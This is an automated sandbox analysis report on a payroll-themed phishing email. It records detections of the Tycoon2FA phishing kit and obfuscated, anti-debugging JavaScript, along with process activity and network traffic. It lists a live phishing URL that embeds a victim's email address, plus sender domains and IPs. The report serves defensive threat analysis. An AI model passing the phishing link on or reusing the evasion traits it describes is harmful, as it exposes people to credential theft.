
Windows Analysis Report
f64da42c-e9a8-a0ac-437d-d14377da4643.eml

Overview

General Information

Sample name: f64da42c-e9a8-a0ac-437d-d14377da4643.eml
Analysis ID: 1640423
MD5: 72d477110463da85c47b6a3d7a6bcb5f
SHA1: b406c919997c8ce218ce73c6c03728445924ef64
SHA256: 42c140d453c2715598c974b451b051b8299f57b9889331251399723408a95c68

Detection

HTMLPhisher, Invisible JS, Tycoon2FA
Score: 92
Range: 0 - 100
Confidence: 100%

Signatures

Yara detected AntiDebug via timestamp check
Yara detected HtmlPhish44
Yara detected Invisible JS
Yara detected Obfuscation Via HangulCharacter
Yara detected Tycoon 2FA PaaS
AI detected suspicious Javascript
AI detected suspicious elements in Email content
AI detected suspicious elements in Email header
Creates files inside the system directory
Deletes files inside the Windows folder
HTML page contains hidden javascript code
Queries the volume information (name, serial number etc) of a device
Sigma detected: Office Autorun Keys Modification
Stores large binary data to the registry

Classification

[Classification chart; categories: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; scale: clean, suspicious, malicious]
  • System is w10x64_ra
  • OUTLOOK.EXE (PID: 6960 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\f64da42c-e9a8-a0ac-437d-d14377da4643.eml" MD5: 91A5292942864110ED734005B7E005C0)
    • ai.exe (PID: 7088 cmdline: "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "5CFEB4FB-04F4-4B2F-9E7F-337451882B82" "1ED012E8-2066-482D-AEE7-618C4311BFF8" "6960" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx" MD5: EC652BEDD90E089D9406AFED89A8A8BD)
    • Acrobat.exe (PID: 6624 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\NHW451JN\Terry.tuttle - Payroll Salary Bonus Distribution.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
      • AcroCEF.exe (PID: 1716 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
        • AcroCEF.exe (PID: 4268 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2256 --field-trial-handle=1552,i,12906053778144983868,4860552742854618519,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • chrome.exe (PID: 2896 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://gs.nthecatepi.ru/btb1KhWg/$terry.tuttle@yodel.co.uk MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 3492 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2020,i,4043445577535756806,6777882503626172561,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=1564 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
Yara matches on dropped files:
Source | Rule | Description | Author | Strings
dropped/chromecache_157 | JoeSecurity_HtmlPhish_44 | Yara detected HtmlPhish_44 | Joe Security |

Yara matches on HTML/JavaScript content:
Source | Rule | Description | Author | Strings
0.6..script.csv | JoeSecurity_Tycoon2FA_1 | Yara detected Tycoon 2FA PaaS | Joe Security |
0.1.d.script.csv | JoeSecurity_Tycoon2FA_1 | Yara detected Tycoon 2FA PaaS | Joe Security |
0.0.d.script.csv | JoeSecurity_HangulCharacter | Yara detected Obfuscation Via HangulCharacter | Joe Security |
0.1.d.script.csv | JoeSecurity_AntiDebugBrowser | Yara detected AntiDebug via timestamp check | Joe Security |
0.0.d.script.csv | JoeSecurity_InvisibleJS | Yara detected Invisible JS | Joe Security |

Sigma detected: Office Autorun Keys Modification
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 6960, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Addins\OneNote.OutlookAddin\1

No Suricata rule has matched



Phishing

Source: Yara match; File source: dropped/chromecache_157, type: DROPPED
Source: Yara match; File source: 0.0.d.script.csv, type: HTML
Source: Yara match; File source: 0.0.pages.csv, type: HTML
Source: Yara match; File source: 0.1.pages.csv, type: HTML
Source: Yara match; File source: 0.0.d.script.csv, type: HTML
Source: Yara match; File source: 0.0.pages.csv, type: HTML
Source: Yara match; File source: 0.1.pages.csv, type: HTML
Source: Yara match; File source: 0.6..script.csv, type: HTML
Source: Yara match; File source: 0.1.d.script.csv, type: HTML
Source: Yara match; File source: 0.0.pages.csv, type: HTML
Source: Yara match; File source: 0.1.pages.csv, type: HTML
Source: 0.1.d.script.csv; Joe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... This script demonstrates several high-risk behaviors, including detecting the presence of web automation tools, disabling common keyboard shortcuts, and implementing a suspicious redirection mechanism. The combination of these behaviors suggests that this script is likely malicious and intended to interfere with the user's normal browsing experience.
Source: 0.2..script.csv; Joe Sandbox AI: Detected suspicious JavaScript with source url: https://gs.nthecatepi.ru/btb1KhWg/$terry.tuttle@yo... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The use of `atob()` and `decodeURIComponent()` to decode and execute remote code is a clear indicator of malicious intent. Additionally, the script appears to be sending data to an untrusted domain, which further increases the risk. Overall, this script exhibits a high level of suspicion and should be treated as a potential security threat.
Source: 0.6..script.csv; Joe Sandbox AI: Detected suspicious JavaScript with source url: https://gs.nthecatepi.ru/btb1KhWg/$terry.tuttle@yo... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. It appears to be a malicious script that is attempting to collect sensitive user data and execute remote code. The script also includes a suspicious form submission to an unknown domain, further indicating malicious intent. Overall, this script poses a significant security risk and should be treated with caution.
Source: 0.0.d.script.csv; Joe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... This script demonstrates high-risk behaviors, including dynamic code execution through the use of `eval()` and obfuscated code. The script appears to be attempting to execute remote or malicious code, which poses a significant security risk. This should be considered a high-risk script that requires immediate investigation and remediation.
Source: Email; Joe Sandbox AI: Detected potential phishing email: Suspicious sender domain 'garde-intl.com' doesn't match the claimed company Yodel Co. Generic payroll subject line with unnecessary reference ID appears designed to create urgency. No-reply sender address for sensitive payroll communication is unusual and suspicious.
Source: Email; Joe Sandbox AI: Detected suspicious elements in Email header: Mismatched PTR records: Header shows 'ybxxqa55.secure.ne.jp' but received from '52597.ip-ptr.tech'. Suspicious received header format with 'unknown' HELO and unusual IP pattern. Multiple IP addresses appearing in headers (27.34.154.55 and 147.45.49.87) indicating potential spoofing. Unusual email authentication pattern with 'Anonymous' cross-tenant authentication. Despite low BCL and SCL scores, the combination of routing anomalies and authentication inconsistencies suggests potential malicious intent. The return-path matches the sender but routing patterns are suspicious. Japanese origin (CTRY:JP) but using English (LANG:en) with suspicious routing through multiple IPs.
Source: https://gs.nthecatepi.ru/btb1KhWg/$terry.tuttle@yodel.co.uk; HTTP Parser: Base64 decoded: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Office 365 Documentation</title> <style> body { font-family: Arial, sans-serif...
Source: Email; Classification: Payroll Fraud
Source: unknown; HTTPS traffic detected: 172.67.151.76:443 -> 192.168.2.16:49708 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 151.101.130.137:443 -> 192.168.2.16:49713 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.16:49714 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.16:49715 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 104.16.5.189:443 -> 192.168.2.16:49726 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 104.16.2.189:443 -> 192.168.2.16:49727 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 142.250.184.196:443 -> 192.168.2.16:49728 version: TLS 1.2
Source: chrome.exe; Memory has grown: Private usage: 1MB later: 36MB
Source: unknown; TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown; TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown; TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown; TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown; TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown; TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown; TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown; TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown; TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown; TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown; TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown; TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown; TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; TCP traffic detected without corresponding DNS query: 142.250.185.227
Source: unknown; TCP traffic detected without corresponding DNS query: 142.250.185.227
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; HTTP traffic detected:
    GET /btb1KhWg/$terry.tuttle@yodel.co.uk HTTP/1.1
    Host: gs.nthecatepi.ru
    Connection: keep-alive
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate, br, zstd
    Accept-Language: en-US,en;q=0.9
Source: global traffic; HTTP traffic detected:
    GET /jquery-3.6.0.min.js HTTP/1.1
    Host: code.jquery.com
    Connection: keep-alive
    sec-ch-ua-platform: "Windows"
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
    sec-ch-ua-mobile: ?0
    Accept: */*
    Sec-Fetch-Site: cross-site
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: script
    Sec-Fetch-Storage-Access: active
    Referer: https://gs.nthecatepi.ru/
    Accept-Encoding: gzip, deflate, br, zstd
    Accept-Language: en-US,en;q=0.9
Source: global traffic; HTTP traffic detected:
    GET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1
    Host: challenges.cloudflare.com
    Connection: keep-alive
    sec-ch-ua-platform: "Windows"
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
    sec-ch-ua-mobile: ?0
    Accept: */*
    Sec-Fetch-Site: cross-site
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: script
    Sec-Fetch-Storage-Access: active
    Referer: https://gs.nthecatepi.ru/
    Accept-Encoding: gzip, deflate, br, zstd
    Accept-Language: en-US,en;q=0.9
Source: global traffic; HTTP traffic detected:
    GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
    Host: cdnjs.cloudflare.com
    Connection: keep-alive
    sec-ch-ua-platform: "Windows"
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
    sec-ch-ua-mobile: ?0
    Accept: */*
    Sec-Fetch-Site: cross-site
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: script
    Sec-Fetch-Storage-Access: active
    Referer: https://gs.nthecatepi.ru/
    Accept-Encoding: gzip, deflate, br, zstd
    Accept-Language: en-US,en;q=0.9
Source: global traffic; HTTP traffic detected:
    GET /turnstile/v0/g/f3b948d8acb8/api.js HTTP/1.1
    Host: challenges.cloudflare.com
    Connection: keep-alive
    sec-ch-ua-platform: "Windows"
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
    sec-ch-ua-mobile: ?0
    Accept: */*
    Sec-Fetch-Site: cross-site
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: script
    Sec-Fetch-Storage-Access: active
    Referer: https://gs.nthecatepi.ru/
    Accept-Encoding: gzip, deflate, br, zstd
    Accept-Language: en-US,en;q=0.9
Source: global traffic; HTTP traffic detected:
    GET /favicon.png HTTP/1.1
    Host: developers.cloudflare.com
    Connection: keep-alive
    sec-ch-ua-platform: "Windows"
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
    Sec-Fetch-Site: cross-site
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: image
    Sec-Fetch-Storage-Access: active
    Referer: https://gs.nthecatepi.ru/
    Accept-Encoding: gzip, deflate, br, zstd
    Accept-Language: en-US,en;q=0.9
Source: global traffic; HTTP traffic detected:
    GET /favicon.png HTTP/1.1
    Host: developers.cloudflare.com
    Connection: keep-alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    Accept: */*
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Sec-Fetch-Storage-Access: active
    Accept-Encoding: gzip, deflate, br, zstd
    Accept-Language: en-US,en;q=0.9
    Cookie: __cf_bm=rU7ik.yBZ0CGRS_GapLIGtLhBad7BYw6EFHJqvSWbiU-1742202807-1.0.1.1-YoVi14pMLPV_9GBfji0g04nrbwZNnJj4Mn.neIRHFi1bgynGU.pnA920.IUwsBZ8wiIMCz74jgYjql2U.NZksKxdKJHl5s8kh3PybeBoK5o
Source: global traffic; HTTP traffic detected:
    GET / HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/10.0
    Host: x1.i.lencr.org
Source: global traffic; DNS traffic detected: DNS query: gs.nthecatepi.ru
Source: global traffic; DNS traffic detected: DNS query: code.jquery.com
Source: global traffic; DNS traffic detected: DNS query: challenges.cloudflare.com
Source: global traffic; DNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global traffic; DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global traffic; DNS traffic detected: DNS query: developers.cloudflare.com
Source: global traffic; DNS traffic detected: DNS query: www.google.com
Source: global traffic; DNS traffic detected: DNS query: x1.i.lencr.org
Source: unknown; HTTP traffic detected:
    POST /dns-query HTTP/1.1
    Host: chrome.cloudflare-dns.com
    Connection: keep-alive
    Content-Length: 128
    Accept: application/dns-message
    Accept-Language: *
    User-Agent: Chrome
    Accept-Encoding: identity
    Content-Type: application/dns-message
Source: unknown; Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown; Network traffic detected: HTTP traffic on port 49679 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown; Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown; Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown; HTTPS traffic detected: 172.67.151.76:443 -> 192.168.2.16:49708 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 151.101.130.137:443 -> 192.168.2.16:49713 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.16:49714 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.16:49715 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 104.16.5.189:443 -> 192.168.2.16:49726 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 104.16.2.189:443 -> 192.168.2.16:49727 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 142.250.184.196:443 -> 192.168.2.16:49728 version: TLS 1.2
Source: C:\Program Files\Google\Chrome\Application\chrome.exe; File created: C:\Windows\SystemTemp\scoped_dir2896_1926784170
Source: C:\Program Files\Google\Chrome\Application\chrome.exe; File deleted: C:\Windows\SystemTemp\scoped_dir2896_1926784170
Source: classification engine; Classification label: mal92.phis.evad.winEML@39/25@18/199
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE; File created: C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmp
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE; File created: C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20250317T0513010965-6960.etl
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE; File read: C:\Users\desktop.ini
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknown; Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\f64da42c-e9a8-a0ac-437d-d14377da4643.eml"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE; Process created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "5CFEB4FB-04F4-4B2F-9E7F-337451882B82" "1ED012E8-2066-482D-AEE7-618C4311BFF8" "6960" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE; Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\NHW451JN\Terry.tuttle - Payroll Salary Bonus Distribution.pdf"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE; Process created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "5CFEB4FB-04F4-4B2F-9E7F-337451882B82" "1ED012E8-2066-482D-AEE7-618C4311BFF8" "6960" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe; Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe; Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2256 --field-trial-handle=1552,i,12906053778144983868,4860552742854618519,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: unknown; Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://gs.nthecatepi.ru/btb1KhWg/$terry.tuttle@yodel.co.uk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe; Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2020,i,4043445577535756806,6777882503626172561,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=1564 /prefetch:3
Source: unknown; Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe; Process created: C:\Windows\System32\msiexec.exe C:\Windows\System32\MsiExec.exe -Embedding 297DA30BCB4995D43FBFB6E639081595
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE; Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\NHW451JN\Terry.tuttle - Payroll Salary Bonus Distribution.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe; Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe; Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe; Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe; Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe; Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2256 --field-trial-handle=1552,i,12906053778144983868,4860552742854618519,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe; Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe; Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe; Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe; Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe; Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe; Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe; Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe; Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe; Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe; Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2020,i,4043445577535756806,6777882503626172561,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=1564 /prefetch:3
Source: C:\Program Files\Google\Chrome\Application\chrome.exe; Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe; Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe; Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe; Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe; Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe; Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe; Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe; Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe; Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe; Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe; Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe; Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe; Process created: unknown unknown
